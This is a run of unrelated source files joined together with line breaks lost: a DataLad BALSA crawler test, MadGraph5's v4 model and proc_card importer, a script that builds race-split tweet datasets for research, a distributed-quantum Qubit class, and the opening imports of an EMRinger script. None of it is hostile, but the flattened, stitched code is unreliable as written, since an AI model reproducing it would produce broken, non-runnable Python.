we base on master eq_(len(commits['incoming-processed']), 2 + 3) eq_(len(commits['master']), 5) # all commits out there -- init ds + init crawler + 1*(incoming, processed) with chpwd(outd): eq_(set(glob('*')), {'dir1', 'file1.nii'}) all_files = sorted(find_files('.')) fpath = opj(outd, 'file1.nii') ok_file_has_content(fpath, "content of file1.nii") ok_file_under_git(fpath, annexed=True) fpath2 = opj(outd, 'dir1', 'file2.nii') ok_file_has_content(fpath2, "content of file2.nii") ok_file_under_git(fpath2, annexed=True) target_files = { './.datalad/crawl/crawl.cfg', './.datalad/crawl/statuses/incoming.json', './.datalad/meta/balsa.json', './.datalad/config', './file1.nii', './dir1/file2.nii', } eq_(set(all_files), target_files) # this test should raise warning that canonical tarball does not have one of the files listed # and that a listed file differs in content _PLUG_HERE = '' @with_tree(tree={ 'study': { 'show': { 'WG33': { 'index.html': """ Download (172 MB) file1.nii dir1 / file2.nii file1b.nii %s """ % _PLUG_HERE, }, }, 'download': { 'WG33.tar.gz': { 'file1.nii': "content of file1.nii", 'dir1': { 'file2.nii': "content of file2.nii", } } } }, 'file': { 'show': { 'JX5V': { 'index.html': """ Download (120 MB) """ }, 'R1BX': { 'index.html': """ Download (26 MB) """ }, 'GSRD': { 'index.html': """ Download (26 MB) """ } }, 'download': { 'file1.nii': "content of file1.nii is different", 'file1b.nii': "content of file1b.nii", 'dir1': { 'file2.nii': "content of file2.nii", } } }, }, archives_leading_dir=False ) @serve_path_via_http @with_tempfile @with_tempfile @known_failure_direct_mode #FIXME @known_failure_v6 #FIXME def test_balsa_pipeline2(ind, topurl, outd, clonedir): list(initiate_dataset( template="balsa", dataset_name='dataladtest-WG33', path=outd, data_fields=['dataset_id'])({'dataset_id': 'WG33'})) with chpwd(outd): with swallow_logs(new_level=logging.WARN) as cml: pipeline = ofpipeline('WG33', url=topurl) out = run_pipeline(pipeline) assert_true('The following files do not exist in the canonical tarball, ' 'but are individually listed files and will not be kept:' in cml.out) assert_true('./file1.nii varies in content from the individually downloaded ' 'file with the same name, it is removed and file from canonical ' 'tarball is kept' in cml.out) eq_(len(out), 1) with chpwd(outd): eq_(set(glob('*')), {'dir1', 'file1.nii'}) all_files = sorted(find_files('.')) fpath = opj(outd, 'file1.nii') ok_file_has_content(fpath, "content of file1.nii") ok_file_under_git(fpath, annexed=True) fpath2 = opj(outd, 'dir1', 'file2.nii') ok_file_has_content(fpath2, "content of file2.nii") ok_file_under_git(fpath2, annexed=True) target_files = { './.datalad/config', './.datalad/crawl/crawl.cfg', './.datalad/crawl/statuses/incoming.json', './.datalad/meta/balsa.json', './file1.nii', './dir1/file2.nii', } eq_(set(all_files), target_files) 1-10 ################################################################################ # # Copyright (c) 2009 The MadGraph5_aMC@NLO Development team and Contributors # # This file is a part of the MadGraph5_aMC@NLO project, an application which # automatically generates Feynman diagrams and matrix elements for arbitrary # high-energy processes in the Standard Model and beyond. # # It is subject to the MadGraph5_aMC@NLO license which should accompany this # distribution. # # For more information, visit madgraph.phys.ucl.ac.be and amcatnlo.web.cern.ch # ################################################################################ from madgraph.core import base_objects """Methods and classes to import v4 format model files.""" import fractions import logging import os import re from madgraph import InvalidCmd, MG4DIR, ReadWrite import madgraph.core.color_algebra as color import madgraph.iolibs.files as files import madgraph.iolibs.save_load_object as save_load_object import madgraph.various.misc as misc from madgraph.core.base_objects import Particle, ParticleList from madgraph.core.base_objects import Interaction, InteractionList logger = logging.getLogger('madgraph.import_v4') #=============================================================================== # import_v4model #=============================================================================== def import_model(model_path, mgme_dir = MG4DIR, absolute=True): """create a model from a MG4 model directory.""" # Check for a valid directory model_path_old = model_path model_path = find_model_path(model_path, mgme_dir, absolute) files_list = [os.path.join(model_path, 'particles.dat'),\ os.path.join(model_path, 'interactions.dat')] for filepath in files_list: if not os.path.isfile(filepath): if not absolute: raise InvalidCmd, "%s directory is not a valid v4 model" % \ (model_path) else: return import_model(model_path_old, mgme_dir, False) # use pickle files if defined if files.is_uptodate(os.path.join(model_path, 'model.pkl'), files_list): model = save_load_object.load_from_file( \ os.path.join(model_path, 'model.pkl')) if model.has_key('version_tag') and model.get('version_tag') == os.path.realpath(model_path) + str(misc.get_pkg_info()): return model, model_path model = base_objects.Model() model.set('particles',files.read_from_file( \ os.path.join(model_path, 'particles.dat'), read_particles_v4)) model.set('interactions',files.read_from_file( \ os.path.join(model_path, 'interactions.dat'), read_interactions_v4, model['particles'])) model.set('name', os.path.split(model_path)[-1]) # save in a pickle files to fasten future usage if ReadWrite: try: save_load_object.save_to_file(os.path.join(model_path, 'model.pkl'), model) except Exception: logger.warning("fail to write %s. This is perfectly fine will just prevent speed boost in future load of this model" %\ os.path.join(model_path, 'model.pkl')) return model, model_path def find_model_path(model_path, mgme_dir, absolute=True): """Find the path to the model, starting with path model_path.""" # treat simple case (model_path is a valid path/ mgme_dir doesn't exist) if os.path.isdir(model_path) and absolute: return model_path elif mgme_dir and os.path.isdir(os.path.join(mgme_dir, 'models', model_path + "_v4")): model_path = os.path.join(mgme_dir, 'models', model_path + "_v4") elif mgme_dir and os.path.isdir(os.path.join(mgme_dir, 'Models', model_path)): model_path = os.path.join(mgme_dir, 'Models', model_path) elif not mgme_dir: error_text = "Path %s is not a valid pathname\n" % model_path error_text += "and no MG_ME installation detected in order to search in Models" raise InvalidCmd(error_text) # Try to build the valid path path_possibilities = [os.path.join(mgme_dir, 'Models', model_path), os.path.join(mgme_dir, 'models', model_path + "_v4"), os.path.join(mgme_dir, 'models', model_path) ] for path in path_possibilities: if os.path.exists(path) and \ not os.path.exists(os.path.join(path, 'particles.py')): return path # No valid path found raise InvalidCmd("Path %s is not a valid pathname" % model_path) #=============================================================================== # read_particles_v4 #=============================================================================== def read_particles_v4(fsock): """Read a list of particle from stream fsock, using the old v4 format""" spin_equiv = {'s': 1, 'f': 2, 'v': 3, 't': 5} color_equiv = {'s': 1, 't': 3, '6': 6, 'o': 8} line_equiv = {'d': 'dashed', 's': 'straight', 'w': 'wavy', 'c': 'curly'} logger.info('load particles') mypartlist = ParticleList() for line in fsock: mypart = Particle() if line.find("MULTIPARTICLES") != -1: break # stop scanning if old MULTIPARTICLES tag found line = line.split("#", 2)[0] # remove any comment line = line.strip() # makes the string clean if line != "": values = line.split() if len(values) != 9: # Not the right number tags on the line raise ValueError, \ "Unvalid initialization string:" + line else: try: mypart.set('name', values[0].lower()) mypart.set('antiname', values[1].lower()) if mypart['name'] == mypart['antiname']: mypart['self_antipart'] = True if values[2].lower() in spin_equiv.keys(): mypart.set('spin', spin_equiv[values[2].lower()]) else: raise ValueError, "Invalid spin %s" % \ values[2] if values[3].lower() in line_equiv.keys(): mypart.set('line', line_equiv[values[3].lower()]) else: raise ValueError, \ "Invalid line type %s" % values[3] mypart.set("mass", values[4]) mypart.set("width", values[5]) if values[6].lower() in color_equiv.keys(): mypart.set('color', color_equiv[values[6].lower()]) else: raise ValueError, \ "Invalid color rep %s" % values[6] #mypart.set("texname", values[7]) mypart.set("pdg_code", int(values[8])) mypart.set('charge', 0.) #mypart.set('antitexname', mypart.get('texname')) except (Particle.PhysicsObjectError, ValueError), why: logger.warning("Warning: %s, particle ignored" % why) else: mypartlist.append(mypart) return mypartlist #=============================================================================== # read_interactions_v4 #=============================================================================== def read_interactions_v4(fsock, ref_part_list): """Read a list of interactions from stream fsock, using the old v4 format. Requires a ParticleList object as an input to recognize particle names.""" logger.info('load interactions') myinterlist = InteractionList() if not isinstance(ref_part_list, ParticleList): raise ValueError, \ "Object %s is not a valid ParticleList" % repr(ref_part_list) for line in fsock: myinter = Interaction() line = line.split("#", 2)[0] # remove any comment line = line.strip() # makes the string clean if line != "": # skip blank values = line.split() part_list = ParticleList() try: for str_name in values: curr_part = ref_part_list.get_copy(str_name.lower()) if isinstance(curr_part, Particle): # Look at the total number of strings, stop if # anyway not enough, required if a variable name # corresponds to a particle! (eg G) if len(values) >= 2 * len(part_list) + 1: part_list.append(curr_part) else: break # also stops if string does not correspond to # a particle name else: break if len(part_list) < 3: raise Interaction.PhysicsObjectError, \ "Vertex with less than 3 known particles found." # Flip part/antipart of first part for FFV, FFS, FFT vertices # according to v4 convention spin_array = [part['spin'] for part in part_list] if spin_array[:2] == [2, 2] and \ not part_list[0].get('self_antipart'): part_list[0]['is_part'] = not part_list[0]['is_part'] myinter.set('particles', part_list) # Give color structure # Order particles according to color # Don't consider singlets color_parts = sorted(enumerate(part_list), lambda p1, p2:\ p1[1].get_color() - p2[1].get_color()) color_ind = [(i, part.get_color()) for i, part in \ color_parts if part.get_color() !=1] colors = [c for i,c in color_ind] ind = [i for i,c in color_ind] # Set color empty by default myinter.set('color', []) if not colors: # All color singlets - set empty pass elif colors == [-3, 3]: # triplet-triplet-singlet coupling myinter.set('color', [color.ColorString(\ [color.T(ind[1], ind[0])])]) elif colors == [8, 8]: # octet-octet-singlet coupling my_cs = color.ColorString(\ [color.Tr(ind[0], ind[1])]) my_cs.coeff = fractions.Fraction(2) myinter.set('color', [my_cs]) elif colors == [-3, 3, 8]: # triplet-triplet-octet coupling myinter.set('color', [color.ColorString(\ [color.T(ind[2], ind[1], ind[0])])]) elif colors == [8, 8, 8]: # Triple glue coupling my_color_string = color.ColorString(\ [color.f(ind[0], ind[1], ind[2])]) my_color_string.is_imaginary = True myinter.set('color', [my_color_string]) elif colors == [-3, 3, 8, 8]: my_cs1 = color.ColorString(\ [color.T(ind[2], ind[3], ind[1], ind[0])]) my_cs2 = color.ColorString(\ [color.T(ind[3], ind[2], ind[1], ind[0])]) myinter.set('color', [my_cs1, my_cs2]) elif colors == [8, 8, 8, 8]: # 4-glue coupling cs1 = color.ColorString([color.f(0, 1, -1), color.f(2, 3, -1)]) #cs1.coeff = fractions.Fraction(-1) cs2 = color.ColorString([color.f(2, 0, -1), color.f(1, 3, -1)]) #cs2.coeff = fractions.Fraction(-1) cs3 = color.ColorString([color.f(1, 2, -1), color.f(0, 3, -1)]) #cs3.coeff = fractions.Fraction(-1) myinter.set('color', [cs1, cs2, cs3]) # The following line are expected to be correct but not physical validations # have been performed. So we keep it commented for the moment. # elif colors == [3, 3, 3]: # my_color_string = color.ColorString(\ # [color.Epsilon(ind[0], ind[1], ind[2])]) # myinter.set('color', [my_color_string]) # elif colors == [-3, -3, -3]: # my_color_string = color.ColorString(\ # [color.EpsilonBar(ind[0], ind[1], ind[2])]) # myinter.set('color', [my_color_string]) else: logger.warning(\ "Color combination %s not yet implemented." % \ repr(colors)) # Set the Lorentz structure. Default for 3-particle # vertices is empty string, for 4-particle pair of # empty strings myinter.set('lorentz', ['']) pdg_codes = sorted([part.get_pdg_code() for part in part_list]) # WWWW and WWVV if pdg_codes == [-24, -24, 24, 24]: myinter.set('lorentz', ['WWWW']) elif spin_array == [3, 3, 3, 3] and \ 24 in pdg_codes and - 24 in pdg_codes: myinter.set('lorentz', ['WWVV']) # gggg if pdg_codes == [21, 21, 21, 21]: myinter.set('lorentz', ['gggg1', 'gggg2', 'gggg3']) # go-go-g # Using the special fvigox routine provides the minus # sign necessary for octet Majorana-vector interactions if spin_array == [2, 2, 3] and colors == [8, 8, 8] and \ part_list[0].get('self_antipart') and \ part_list[1].get('self_antipart'): myinter.set('lorentz', ['go']) # If extra flag, add this to Lorentz if len(values) > 3 * len(part_list) - 4: myinter.get('lorentz')[0] = \ myinter.get('lorentz')[0]\ + values[3 * len(part_list) - 4].upper() # Use the other strings to fill variable names and tags # Couplings: special treatment for 4-vertices, where MG4 used # two couplings, while MG5 only uses one (with the exception # of the 4g vertex, which needs special treatment) # DUM0 and DUM1 are used as placeholders by FR, corresponds to 1 if len(part_list) == 3 or \ values[len(part_list) + 1] in ['DUM', 'DUM0', 'DUM1']: # We can just use the first coupling, since the second # is a dummy myinter.set('couplings', {(0, 0):values[len(part_list)]}) if myinter.get('lorentz')[0] == 'WWWWN': # Should only use one Helas amplitude for electroweak # 4-vector vertices with FR. I choose W3W3NX. myinter.set('lorentz', ['WWVVN']) elif values[len(part_list)] in ['DUM', 'DUM0', 'DUM1']: # We can just use the second coupling, since the first # is a dummy myinter.set('couplings', {(0, 0):values[len(part_list)+1]}) elif pdg_codes == [21, 21, 21, 21]: # gggg myinter.set('couplings', {(0, 0):values[len(part_list)], (1, 1):values[len(part_list)], (2, 2):values[len(part_list)]}) elif myinter.get('lorentz')[0] == 'WWWW': # Need special treatment of v4 SM WWWW couplings since # MG5 can only have one coupling per Lorentz structure myinter.set('couplings', {(0, 0):\ 'sqrt(' + values[len(part_list)] + \ '**2+' + \ values[len(part_list) + 1] + \ '**2)'}) else: #if myinter.get('lorentz')[0] == 'WWVV': # Need special treatment of v4 SM WWVV couplings since # MG5 can only have one coupling per Lorentz structure myinter.set('couplings', {(0, 0):values[len(part_list)] + \ '*' + \ values[len(part_list) + 1]}) #raise Interaction.PhysicsObjectError, \ # "Only FR-style 4-vertices implemented." # SPECIAL TREATMENT OF COLOR # g g sq sq (two different color structures, same Lorentz) if spin_array == [3, 3, 1, 1] and colors == [-3, 3, 8, 8]: myinter.set('couplings', {(0, 0):values[len(part_list)], (1, 0):values[len(part_list)]}) # Coupling orders - needs to be fixed order_list = values[2 * len(part_list) - 2: \ 3 * len(part_list) - 4] def count_duplicates_in_list(dupedlist): """return a dictionary with key the element of dupeList and with value the number of times that they are in this list""" unique_set = set(item for item in dupedlist) ret_dict = {} for item in unique_set: ret_dict[item] = dupedlist.count(item) return ret_dict myinter.set('orders', count_duplicates_in_list(order_list)) myinter.set('id', len(myinterlist) + 1) myinterlist.append(myinter) except Interaction.PhysicsObjectError, why: logger.error("Interaction ignored: %s" % why) return myinterlist #=============================================================================== # read_proc_card.dat (mg4 format) #=============================================================================== def read_proc_card_v4(fsock): """A simple function reading the files in fsock and returning a ProcCardv4Reader object. This function authorize to have the same syntax as for the other files treatment""" reader = ProcCardv4Reader(fsock) return reader class ParticleError(InvalidCmd): """ A class to carch the error""" pass class WrongFileFormat(InvalidCmd): """A specific class error for wrong V4 proc_card""" pass class ProcCardv4Reader(object): """read a proc_card.dat in the mg4 format and creates the equivalent routine for mg5""" #tag in the proc_card.dat which split the proc_card content # line pattern (remove comment at the end of the line) pat_line = re.compile(r"""^\s*(?P[^\#]*?)\s*(\#|$)""", re.DOTALL) def __init__(self, fsock): """init the variable""" self.process = [] # List of ProcessInfo self.model = "" # name of the model self.multipart = [] # list of the mg4 definition of multiparticle self.particles_name = set() # set of authorize particle name self.couplings_name = set() # set of mandatory couplings self.process_path = os.path.realpath(os.path.join( os.path.dirname(fsock.name), os.pardir)) # Reading the files and store the information in string format. self.analyze_v4_proc_card(fsock) def analyze_v4_proc_card(self, fsock): """read the file and fullfill the variable with mg4 line""" proc_card = fsock.read() # store process information process_open = False process_re = re.search(\ r"^# Begin\s+PROCESS.*?^(?P.*)^# End\s+PROCESS", proc_card, re.MULTILINE|re.DOTALL) if not process_re: raise WrongFileFormat('No valid Begin...End PROCESS tags') model_re = re.search(\ r"^# Begin\s+MODEL.*?^(?P.+?)(\s+|$)^# End\s+MODEL", proc_card, re.MULTILINE|re.DOTALL) if not model_re: raise WrongFileFormat('No valid Begin...End MODEL tags') multiparticles_re = re.search(\ r"^# Begin\s+MULTIPARTICLES.*?^(?P.*)^# End\s+MULTIPARTICLES", proc_card, re.MULTILINE|re.DOTALL) if not multiparticles_re: raise WrongFileFormat('No valid Begin...End MULTIPARTICLES tags') process_lines = process_re.group('process').split('\n') for line in process_lines: # an 'end_coup' stop the current process, # 'done' finish the list of process analyze_line = self.pat_line.search(line) if analyze_line: data = analyze_line.group('info') #skip the comment if not data: continue if not process_open and 'done' not in data: process_open = True self.process.append(ProcessInfo(data)) elif 'end_coup' in data: process_open = False elif 'done' not in data: self.process[-1].add_coupling(data) self.model = model_re.group('model') multiparticles_lines = multiparticles_re.group('multiparticles').split('\n') for line in multiparticles_lines: analyze_line = self.pat_line.search(line) if analyze_line: line = analyze_line.group('info') #skip the comment if not line: continue data = line.split() self.particles_name.add(data[0].lower()) self.multipart.append(line) def extract_command_lines(self, model): """Return the MG5 command line corresponding to this proc_card the MG5 command import model is skipped (since the model should be loaded -it is one of the argument-)""" # extract useful information of the model self.extract_info_from_model(model) # use the model information for the splitting in particles of the mg4 #process line. for process in self.process: process.analyze_process(self.particles_name) #Now we are in position to write the lines call lines = [] #first write the lines associate to the multiparticls definition if self.multipart: lines.append('# Define multiparticle labels') for multipart in self.multipart: data = self.separate_particle(multipart, self.particles_name) lines.append('define ' + ' '.join(data)) # secondly define the lines associate with diagram if self.process: lines.append('# Specify process(es) to run') for i, process in enumerate(self.process): if i == 0: lines.append('generate %s' % \ process.mg5_process_line(self.couplings_name)) else: lines.append('add process %s' % \ process.mg5_process_line(self.couplings_name)) #finally export the madevent output lines.append('# Output processes to MadEvent directory') lines.append('output -f') return lines def extract_info_from_model(self, model): """ creates the self.particles_name (list of all valid name) and self.couplings_name (list of all couplings)""" # add in self.particles_name (it contains normally the mulpart name #already) all the valid name of particle of the model for particle in model['particles']: self.particles_name.add(particle['name']) self.particles_name.add(particle['antiname']) # add in self.couplings_name the couplings name of the model for interaction in model['interactions']: for coupling in interaction['orders'].keys(): self.couplings_name.add(coupling) @staticmethod def separate_particle(line, possible_str): """ for a list of concatanate variable return a list of particle name""" line = line.lower() # Particle name are not case sensitive out = [] # list of the particles # The procedure to find particles is the following # - check if the combination of 4 string form a valid particle name # if it is, move of 4 characters and check for the next particles. # if not try with 3, 2, 1 # if still not -> exit. pos = 0 # current starting position old_pos = -1 # check that we don't have infinite loop line += ' ' #add 4 blank for security while pos < len(line) - 4: #Check for infinite loop if pos == old_pos: logging.error('Invalid particle name: %s' % \ line[pos:pos + 4].rstrip()) raise ParticleError('Invalid particle name %s' % line[pos:pos + 4].rstrip()) old_pos = pos # check for pointless character if line[pos] in [' ', '\n', '\t']: pos += 1 continue # try to find a match at 4(then 3/2/1) characters for i in range(4, 0, -1): if line[pos:pos + i] in possible_str: out.append(line[pos:pos + i]) pos = pos + i break return out class ProcessInfo(object): """This is the basic object for storing process information""" def __init__(self, line): """Initialize information""" self.particles = [] # list tuple (level, particle) self.couplings = {} # coupling -> max_order self.decays = [] # ProcessInfo of the decays self.tag = '' # tag of the process self.s_forbid = [] # list of particles forbids in s channel self.forbid = [] # list of particles forbids self.line = line # initialization line self.is_mg5_valid = False #some shortcut self.separate_particle = ProcCardv4Reader.separate_particle def analyze_process(self, particles_name): """Add a line information two format are possible (decay chains or not) pp>h>WWj /a $u @3 pp>(h>WW)j /a $u @3 """ line = self.line #extract the tag if '@' in line: split = line.split('@') line = split[0] self.tag = split[1] # check if we have a MG5 format if '/mg5/' in line: self.line = line.replace('/mg5/','') self.is_mg5_valid = True return if ',' in line or '=' in line: self.is_mg5_valid = True return # extract (S-)forbidden particle pos_forbid = line.find('/') pos_sforbid = line.find('$') # Select the restrictions (pos is -1 if not defined) #and remove the restrictions from the line if pos_forbid != -1 and pos_sforbid != -1: if pos_forbid > pos_sforbid : self.forbid = self.separate_particle(line[pos_forbid + 1:], \ particles_name) self.s_forbid = self.separate_particle(\ line[pos_sforbid + 1:pos_forbid], particles_name) line = line[:min(pos_forbid, pos_sforbid)] else: self.forbid = self.separate_particle(\ line[pos_forbid + 1:pos_sforbid], particles_name) self.s_forbid = self.separate_particle(line[pos_sforbid + 1:], \ particles_name) line = line[:min(pos_forbid, pos_sforbid)] # Same but if they are no S-forbidden particles elif pos_forbid != -1: self.forbid = self.separate_particle(line[pos_forbid + 1:], \ particles_name) line = line[:pos_forbid] # Same but if they are no forbidden particles elif pos_sforbid != -1: self.s_forbid = self.separate_particle(line[pos_sforbid + 1:], \ particles_name) line = line[:pos_sforbid] # Deal with decay chains, returns lines whitout the decay (and treat #the different decays. if '(' in line: line = self.treat_decay_chain(line, particles_name) #define the level of each particle level_content = line.split('>') for level, data in enumerate(level_content): particles = self.separate_particle(data, particles_name) if particles: [self.particles.append((level, name)) for name in particles] def treat_decay_chain(self, line, particles_name): """Split the information of the decays into a tree of ProcessInfo.""" level = 0 #depth of the decay chain out_line = '' # core process for character in line: if character == '(': level += 1 if level == 1: decay_line = "" # initialize a new decay info else: decay_line += '(' continue elif character == ')': level -= 1 if level == 0: #store the information self.decays.append(ProcessInfo(decay_line)) self.decays[-1].add_restrictions(self.forbid, self.s_forbid, None) self.decays[-1].analyze_process(particles_name) out_line += decay_line[:decay_line.find('>')] else: decay_line += ')' continue elif level: decay_line += character else: out_line += character return out_line def add_coupling(self, line): """Add the coupling information to the process""" data = line.split('=') self.couplings[data[0]] = int(data[1]) def add_restrictions(self, forbid, s_forbid, couplings): """Associate some restriction to this diagram""" self.forbid = forbid self.s_forbid = s_forbid self.couplings = couplings def mg5_process_line(self, model_coupling): """Return a valid mg5 format for this process """ if self.is_mg5_valid: return self.line text = '' # Write the process cur_level = 0 for level, particle in self.particles: if level > cur_level: text += '> ' cur_level += 1 text += '%s ' % particle # Write the constraints if self.s_forbid: text += '$ ' + ' '.join(self.s_forbid) + ' ' if self.forbid: text += '/ ' + ' '.join(self.forbid) + ' ' #treat decay_chains for decay in self.decays: decay_text = decay.mg5_process_line(model_coupling) if ',' in decay_text: text = text.rstrip() + ', (%s) ' % decay_text.strip() else: text = text.rstrip() + ', %s ' % decay_text.strip() # write the tag if self.tag: text += '@%s ' % self.tag if self.couplings: if not self.tag: text += '@0 ' #write the rules associate to the couplings text += self.mg5_couplings_line(model_coupling, len(self.particles)) return text.rstrip() def mg5_couplings_line(self, model_coupling, nb_part): """Return the assignment of coupling for this process""" out = '' for coupling in model_coupling: if self.couplings.has_key(coupling): # Need coupling for all cases, since might be decay chain out += '%s=%s ' % (coupling, self.couplings[coupling]) else: # if not define put to zero (mg4 default) out += '%s=0 ' % coupling return out import sys import sklearn.utils from tqdm import tqdm project = 'PATH/TO/PROJECT' sys.path.insert(0, project + '/src/models') from data_utils import get_data, CONF_LEVEL, normalize_text, to_file from twitter_utils import happy, sad, MENTION from data_handler import read_files SEED = 16 df = get_data(project + '/path/to/downloaded/twitteraae_all') emotions = happy + sad cleaned = df[~df.text.str.contains('|'.join(emotions))] cleaned = sklearn.utils.shuffle(cleaned, random_state=SEED) with open(project + '/data/processed/sent_race/vocab', 'r') as f: vocab = f.readlines() vocab = map(lambda s: s.strip(), vocab) vocab_d = {x: 0 for x in vocab} pos_wh, pos_aa, neg_wh, neg_aa = read_files(project + '/data/processed/sent_race/') prev_sent = {} for s in pos_wh + pos_aa + neg_wh + neg_aa: try: sen = ' '.join([str(vocab[w]) for w in s]) prev_sent[sen] = 0 except: pass def get_race(df, min_len=1): wh_data = [] aa_data = [] white = df[(df.wh > CONF_LEVEL)] white = white.filter(items=['text']) for ind in tqdm(range(len(white))): try: t = normalize_text(white.iloc[ind].text) if len(t) < min_len: continue if len(set(t)) == 1 and t[0] == MENTION: continue if not all(x in vocab_d for x in t): continue try: s = ' '.join([w for w in t]) if s in prev_sent: continue except: continue wh_data.append(t) except: pass if len(wh_data) >= 100000: break print 'reached 100k after {0} tweets'.format(ind) aa = df[(df.aa > CONF_LEVEL)] aa = aa.filter(items=['text']) for ind in tqdm(range(len(aa))): try: t = normalize_text(aa.iloc[ind].text) if len(t) < min_len: continue if len(set(t)) == 1 and t[0] == MENTION: continue if not all(x in vocab_d for x in t): continue try: s = ' '.join([w for w in t]) if s in prev_sent: continue except: continue aa_data.append(t) except: pass if len(aa_data) >= 100000: break print 'reached 100k after {0} tweets'.format(ind) return wh_data, aa_data wh, aa = get_race(cleaned, 3) id2voc = dict(enumerate(vocab)) voc2id = {v: k for k, v in id2voc.iteritems()} pos_pos, neg_pos = aa[:50000], aa[50000:] pos_neg, neg_neg = wh[:50000], wh[50000:] to_file(project + '/data/processed/unseen_race/', voc2id, vocab, pos_pos, pos_neg, neg_pos, neg_neg) rheaparekh/Distributed_Quantum_Phase_Estimationinterlinq/objects/qubit.py10-100 from interlinq.utils import Constants from .operation import Operation class Qubit(object): """ Qubit object which stores the operations performed on it """ def __init__(self, computing_host_id: str, q_id: str, prepare_qubit: bool = True): """ Returns the important things for a qubit object in a quantum circuit Args: computing_host_id (str): ID of the computing host where the qubit is located q_id (str): ID of the qubit prepare_qubit (bool): Boolean field which indicates if the qubit should be prepared when initiated. This should be set to False for qubits which are created by sending/receiver EPR pairs """ self._computing_host_id = computing_host_id self._q_id = q_id self._operations = {} self._current_layer = 0 if prepare_qubit: # Prepare the qubits when initiated # prepare_qubits should be False when initiating a qubit with the # operations 'send_epr' or 'receive_epr' self._prepare() @property def q_id(self): """ Get the ID of the qubit Returns: (str): ID of the qubit """ return self._q_id @property def computing_host_id(self): """ Get the *computing_host_id* linked to the qubit Returns: (str): ID of the computing host where the qubit is located """ return self._computing_host_id @property def operations(self): """ Get the *operations* in the layer. Returns: (list): List of Operation objects, which contains information about the operation to be performed on the quantum circuit """ return self._operations @property def current_layer(self): """ Get the *current_layer*, which is the layer of the last operation on the qubit. Returns: (int): The layer number """ return self._current_layer def _update_operations(self, op: Operation): """ Update the list of operations performed on the qubit with the latest operation Args: op (Operation): Last operation performed on the qubit """ self._operations[self._current_layer] = op def _prepare(self): """ Operation to prepare the qubit """ op = Operation( name=Constants.PREPARE_QUBITS, qids=[self._q_id], computing_host_ids=[self.computing_host_id], ) self._update_operations(op) def update_layer(self, layer: int): """ Update the list of operations performed on the qubit with th Args: layer (int): Last operation performed on the qubit """ self._current_layer = layer def single(self, gate: str, gate_param: list = None): """ Operation to apply a single gate to the qubit Args: gate (str): Name of the single qubit gate to be applied gate_param (list): Parameter for rotational gates """ op = Operation( name=Constants.SINGLE, qids=[self.q_id], gate=gate, gate_param=gate_param, computing_host_ids=[self.computing_host_id], ) self.update_layer(self.current_layer + 1) self._update_operations(op) def two_qubit(self, gate, target_qubit, gate_param=None): """ Operation to apply a two qubit gate to the qubit Args: gate (str): Name of the single qubit gate to be applied target_qubit (Qubit): The other qubit on which the qubit gate is applied on. In case on control gates, this is the target qubit gate_param (iterable): Parameter for rotational gates """ computing_host_ids = [self.computing_host_id] if target_qubit.computing_host_id != self.computing_host_id: computing_host_ids.append(target_qubit.computing_host_id) op = Operation( name=Constants.TWO_QUBIT, qids=[self.q_id, target_qubit.q_id], gate=gate, gate_param=gate_param, computing_host_ids=computing_host_ids, ) if target_qubit.current_layer + 1 > self.current_layer + 1: target_qubit.update_layer(target_qubit.current_layer + 1) self.update_layer(target_qubit.current_layer + 1) else: target_qubit.update_layer(self.current_layer + 1) self.update_layer(self.current_layer + 1) self._update_operations(op) def classical_ctrl_gate(self, gate, bit_id, gate_param=None): """ Operation to apply a classical control gate to the qubit Args: gate (str): Name of the single qubit gate to be applied bit_id (str): ID of the bit which controls if the gate should be applied gate_param (list): Parameter for rotational gates """ op = Operation( name=Constants.CLASSICAL_CTRL_GATE, qids=[self._q_id], cids=[bit_id], gate=gate, gate_param=gate_param, computing_host_ids=[self.computing_host_id], ) self.update_layer(self.current_layer + 1) self._update_operations(op) def send_ent(self, receiver_id, pre_allocated=True): """ Operation to send an EPR pair Args: receiver_id (str): ID of the computing host which receives the EPR pair pre_allocated (bool): Boolean value which determines if the qubit is pre_allocated or not """ op = Operation( name=Constants.SEND_ENT, qids=[self._q_id], computing_host_ids=[self.computing_host_id, receiver_id], pre_allocated_qubits=pre_allocated, ) self.update_layer(self.current_layer + 1) self._update_operations(op) def rec_ent(self, sender_id, pre_allocated=True): """ Operation to receive an EPR pair Args: sender_id (str): ID of the computing host which sends the EPR pair pre_allocated (bool): Boolean value which determines if the qubit is pre_allocated or not """ op = Operation( name=Constants.REC_ENT, qids=[self._q_id], computing_host_ids=[self.computing_host_id, sender_id], pre_allocated_qubits=pre_allocated, ) self.update_layer(self.current_layer + 1) self._update_operations(op) def send_classical(self, bit_id, receiver_qubit): """ Operation to send a classical bit Args: bit_id (str): ID of the bit which has to be sent receiver_qubit (Qubit): Qubit which receives the classical bit """ op = Operation( name=Constants.SEND_CLASSICAL, cids=[bit_id], computing_host_ids=[ self.computing_host_id, receiver_qubit.computing_host_id, ], ) if receiver_qubit.current_layer + 1 > self.current_layer + 1: receiver_qubit.update_layer(receiver_qubit.current_layer + 1) self.update_layer(receiver_qubit.current_layer + 1) else: receiver_qubit.update_layer(self.current_layer + 1) self.update_layer(self.current_layer + 1) self._update_operations(op) def rec_classical(self, bit_id, sender_qubit): """ Operation to receive a classical bit Args: bit_id (str): ID of the bit which has to be sent sender_qubit (Qubit): Qubit which sends the classical bit """ op = Operation( name=Constants.REC_CLASSICAL, cids=[bit_id], computing_host_ids=[self.computing_host_id, sender_qubit.computing_host_id], ) if sender_qubit.current_layer + 1 > self.current_layer + 1: sender_qubit.update_layer(sender_qubit.current_layer + 1) self.update_layer(sender_qubit.current_layer + 1) else: sender_qubit.update_layer(self.current_layer + 1) self.update_layer(self.current_layer + 1) self._update_operations(op) def measure(self, bit_id=None): """ Operation to measure the qubit Args: bit_id (str): ID of the bit where the result of the measurement has to be stored """ if bit_id is None: bit_id = self.q_id op = Operation( name=Constants.MEASURE, qids=[self.q_id], cids=[bit_id], computing_host_ids=[self.computing_host_id], ) self.update_layer(self.current_layer + 1) self._update_operations(op) 1-10 # Rolling rotamericity metric ######################################################################## # Package imports import numpy as np import math from emringer import ringer_chi, ringer_residue from libtbx import easy_pickle import matplotlib.pyplot as plt import argparse from matplotlib import rcParams from itertools import count, groupby rcParams['figure.autolayout'] = True rcParams['xtick.labelsize'] = 16 rcParams['ytick.labelsize'] = 16 rcParams['axes.labelsize'] = 24 rcParams['axes.titlesize'] = 24 Residue_codes = ["ARG","ASN","ASP","CYS","GLU","GLN","HIS", "LEU","LYS","MET","PHE","SER","TRP","TYR","SEC","PYL"] Branched_residues = ["THR","VAL","ILE"] No_c_gamma = ["ALA", "GLY"] Weird = ["PRO"] 